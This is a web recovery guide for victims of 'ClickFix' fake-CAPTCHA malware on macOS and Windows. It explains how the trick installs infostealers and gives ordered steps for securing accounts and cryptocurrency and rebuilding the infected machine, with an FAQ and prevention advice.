Recovery guide · ClickFix · macOS & Windows
You pasted a command you shouldn’t have. You can still fix this.
A fake “verification” page told you to copy something and run it in Terminal (macOS) / the Run box (Windows). Doing so installed malware that steals passwords and redirects cryptocurrency. This guide walks you out of it, in the right order.
Written after a real infection, with the steps that actually worked. Pick your system below — the urgent account steps are the same for both; the cleanup differs.
The one thing to understand: the malware already copied your data — cleaning the computer won’t un-steal it. The live emergency is your accounts and any crypto, not the machine. So the order below puts changing passwords and securing crypto before fixing the device. That order matters.
Choose your system
What just happened
It’s called “ClickFix”
ClickFix is a trick, not a hack. A web page — often a fake CAPTCHA or “I’m not a robot” check, or a phony “fix this error” prompt — tells you to copy some text and run it in the Terminal in the Run box (Win+R), or in PowerShell. The instant you run it, it quietly downloads and installs malware.
It works precisely because you ran it yourself. Your computer’s built-in protections assume an action you take on purpose is one you meant, so they step aside. A password box usually follows; if you typed your Mac/Windows password in, it handed the malware administrator control. The pasted command typically launches a trusted Windows tool (like PowerShell or mshta) so it blends in, then pulls down the real payload.
The payload is commonly an “infostealer” — software built to grab passwords, browser data, and cryptocurrency wallets fast — on Windows often Lumma, StealC, or similar, sometimes alongside a remote-access trojan — sometimes bundled with a “clipper” that swaps copied crypto addresses. This guide uses one real macOS case as its worked example, with Windows specifics on their own pages.
Am I affected?
Signs this happened to you
- A “verification” or “fix” page told you to copy text and run it in Terminal via the Run box (Win+R), the Win+X menu, or the Explorer address bar.
- You ran it, and then a password prompt appeared that you typed your Mac password into.
- You pressed Win+R, pasted, and hit Enter — possibly seeing a brief black window flash and vanish.
- Nothing obvious seemed to happen afterward. (That’s the design; it runs silently in the background.)
- Optional later signs: unexpected logins, password-reset emails you didn’t request, or crypto sent to an address you don’t recognise.
If the paste step matches, treat yourself as affected and start the steps below. It’s better to over-react here than to wait for proof.
Do this now — in order
The recovery protocol
Work top to bottom. The sequence is deliberate: stop the bleeding, move to safe ground, then secure what can still be lost. The orange steps are time-sensitive, and they’re identical on Mac and Windows.
Disconnect the device from the internet Do now
Turn off Wi-Fi or unplug the network cable. Leave it off.
This cuts off any remote control and stops further data being sent out. The machine is safest while it’s offline — keep it that way until you rebuild it.
Switch to a different, clean device Use another device
Do every step below on a phone or a computer that was not infected — ideally on a different network (mobile data is fine).
Anything you type on the infected machine could be watched or its clipboard tampered with. Don’t use it to log in or change passwords.
Change your passwords — and log out everywhere Do now
From the clean device, change passwords in this order: email first (it’s the reset path for everything else), then banking/financial, then everything important. For each account, also use its “log out of all sessions / sign out everywhere” option, and turn on two-factor authentication.
The malware can steal login “session cookies,” which let an attacker stay logged in even after you change the password — unless you also end active sessions. That step is what closes the door.
If you hold any crypto, treat it as an emergency Do now
On the clean device, create a brand-new wallet with a new recovery phrase and move your funds there. Assume the old wallet and its recovery phrase are compromised. Never reuse a recovery phrase that was ever stored on the infected machine.
This malware class hunts wallet files and recovery phrases, and a “clipper” can silently redirect transactions. See the crypto section below.
Tell your bank; consider a credit freeze
Report possible exposure of card and account details. Watch for unusual activity, and consider a fraud alert or credit freeze with the relevant credit bureau.
Card numbers and banking logins are prime targets; your bank can monitor or reissue.
Rotate any technical & work credentials
If the machine held SSH keys, API keys, or saved logins for hosting, domains, or client accounts, reissue the keys and reset those passwords too.
Stealers specifically collect developer secrets. One reused credential can spread the damage.
Rebuild the machine, then report it
Erase and reinstall macOS rather than picking the malware out by hand — the Clean & rebuild (Mac) guide walks you through it, including rescuing your files safely first.
Reset or cleanly reinstall Windows rather than picking the malware out by hand — the Clean & rebuild (Windows) guide walks you through it, including rescuing your files safely first.
A clean reinstall is the only way to be sure persistence is gone. Then report the incident to your national fraud or cybercrime authority — it helps others and may support any claim.
Why changing the password isn’t always enough
Modern stealers grab the small files (“cookies”) that keep you logged in. With those, an attacker can resume your existing session — sometimes bypassing two-factor authentication — even after a password change. That’s why every step above pairs the new password with “log out of all sessions.” Do both, not just one.
Use a password manager for the reset
You’re about to change a lot of passwords. A manager lets you set a strong, unique one per account so a future breach can’t cascade — and it won’t autofill your credentials into a look-alike phishing page.
Prefer free and open-source? Bitwarden is excellent.
Fix the machine
Clean & rebuild: wipe, don’t tinker
For malware that ran with administrator rights, the only way to be certain it’s gone is a clean reinstall. Each guide gets your personal files out safely first — data only, never programs — then rebuilds.
Protect your crypto
The clipboard trap
Many of these infections include a “clipper”: a component that watches your clipboard and, the moment you copy a cryptocurrency address, silently replaces it with the attacker’s address. You paste, glance, and send — and the money goes to them.
If you sent crypto from the infected machine, verify it
Check your transaction history against the address you meant to send to. If a payment went somewhere unexpected, that’s the clipper. On a block explorer you can confirm exactly where funds landed.
Going forward: move funds to a fresh wallet (new recovery phrase) made on a clean device, and always re-check a pasted address against the source before sending — ideally on a device you trust.
Move funds to a hardware wallet
A hardware wallet keeps your keys on a separate offline device, so a future infostealer on your computer can’t read them. Set one up on a clean device and move your funds using a brand-new recovery phrase.
For responders
Technical details & indicators of compromise
The full breakdown — attack chain, persistence locations, recovered capabilities, and indicators of compromise — lives on a page per system. The macOS page documents one fully analysed sample; the Windows page focuses on the durable, artifact-based indicators, since Windows payloads change campaign to campaign.
Questions people ask
ClickFix recovery FAQ
Short, direct answers to the things people search for right after running a command from a fake CAPTCHA.
I pasted the command from a fake CAPTCHA — what should I do first?
Treat it as a data breach, not a computer problem. On a different, clean device, change your email password first (it’s the reset path for everything else), then your banking and other important accounts, and use each account’s “log out of all sessions” option. If you hold cryptocurrency, move it to a new wallet. Cleaning or resetting the infected machine comes after all of that.
Did it steal my passwords?
Assume yes for anything saved in your browser or on the device. These infostealers grab saved passwords, browser cookies, autofill data and crypto wallets within seconds of running. That is exactly why changing your passwords from a clean device is the first priority.
Nothing happened after I ran it — am I safe?
Not necessarily. Many stealers do their work silently in a few seconds and then delete themselves, so a quiet, normal-looking machine is not evidence that you’re fine. Go through the account-security steps regardless of whether you saw anything happen.
Will changing my password be enough?
Not on its own. Stealers also take session cookies that can keep an attacker logged in even after you change a password. Pair every new password with “log out of all sessions” / “sign out everywhere,” and turn on two-factor authentication.
Do I need to factory reset, or is an antivirus scan enough?
A scan can find and remove known payloads, but if the malware ran with administrator rights the only way to be certain it’s gone is a clean reinstall — “Erase All Content and Settings” on a Mac, or “Reset this PC” / a clean USB install on Windows. Either way, the account-security steps matter more than the wipe.
Is my cryptocurrency at risk?
Yes. These infections specifically hunt wallet files and recovery phrases, and many include a “clipper” that silently swaps a copied crypto address for the attacker’s. Move funds to a new wallet with a new recovery phrase, created on a clean device, and always re-check a pasted address before sending.
How do I find out which command I ran?
On Windows, the Run dialog history is stored in the registry (the RunMRU key) and usually still holds the line you pasted. On a Mac, your shell history may show it. Don’t re-run it — the technical pages list safe, read-only ways to check.
Does this affect Macs too, or only Windows?
Both. ClickFix shows Mac users a command to paste into Terminal (often installing the Atomic macOS Stealer family) and Windows users one for the Run box or PowerShell (often Lumma, StealC and similar). The recovery steps in this guide cover both systems.
What is ClickFix?
ClickFix is a social-engineering trick in which a fake CAPTCHA or error page convinces you to copy and run a command yourself, which installs malware. Because you run it deliberately, it sidesteps many protections. It surged through 2025–2026 to become one of the most common attack methods, second only to phishing.
Next time
How to not fall for it again
No real site asks you to run commands
Legitimate websites, CAPTCHAs, and error messages never ask you to paste commands into Terminalthe Run box, PowerShell, or the address bar. That request alone is the red flag.
Running pasted text is the danger
If instructions end by piping text into your shell, or tell you to press shortcuts to open Terminal first, stop.If instructions tell you to press Win+R, Win+X, or paste into Explorer’s address bar, stop. Close the page.
Keep your system updated
Recent macOS versions warn when pasting into Terminal could be harmful — don’t dismiss that warning.Keep Windows and Microsoft Defender current; consider blocking the Run dialog for standard users via Group Policy.
Verify crypto addresses at the source
Always confirm a pasted wallet address against a trusted source before sending, on a device you trust.